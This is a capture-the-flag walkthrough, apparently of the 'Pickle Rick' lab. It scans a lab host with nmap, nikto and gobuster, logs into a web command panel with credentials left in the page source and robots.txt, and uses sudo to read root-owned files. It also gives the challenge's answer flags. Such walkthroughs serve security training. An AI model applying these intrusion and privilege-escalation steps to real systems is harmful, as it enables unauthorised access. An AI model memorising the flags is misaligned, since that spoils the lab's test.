What is the first ingredient that Rick needs?
Lets check what's exposed
nmap -sV 10.80.145.80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelLooks like we have ssh and http, lets see what we can dig out from the website
nikto -h 10.80.145.80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.80.145.80
+ Target Hostname: 10.80.145.80
+ Target Port: 80
+ Start Time: 2025-12-17 13:48:38 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /login.php: Admin login page/section found.
+ 8074 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2025-12-17 13:50:57 (GMT0) (139 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedgobuster dir -u 10.80.145.80 -w /usr/share/wordlists/dirb/common.txt -x php,html,js,txt,asp,aspx,jsp
...
/assets (Status: 301) [Size: 313] [--> http://10.80.145.80/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
...curl 10.80.145.80
...
Username: R1ckRul3s
...Looks like we have the username in the html of the index and a few hidden directories and a robots.txt
curl 10.80.145.80/robots.txt
WubbalubbadubdubThat does not look like a normal robots entry
/login.php takes you to a login page, trying the username from the index with the content in robots as the password gets you to a command panel
ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txtit seems we cant cat any of the files but we can run less
less Sup3rS3cretPickl3Ingred.txtAnwser: mr. meeseek hair
What is the second ingredient in Rick’s potion?
less clue.txt
Look around the file system for the other ingredient.ls /home
rick
ubuntu
ls /home/rick
second ingredients
less /home/rick/second\ ingredientsAnswer: 1 jerry tear
What is the last and final ingredient?
There is nothing else within /home
ls -alh /
ls -alh /root/
sudo ls -alh /root/
...
-rw-r--r-- 1 root root 29 Feb 10 2019 3rd.txt
...
sudo less /root/3rd.txtAnswer: fleeb juice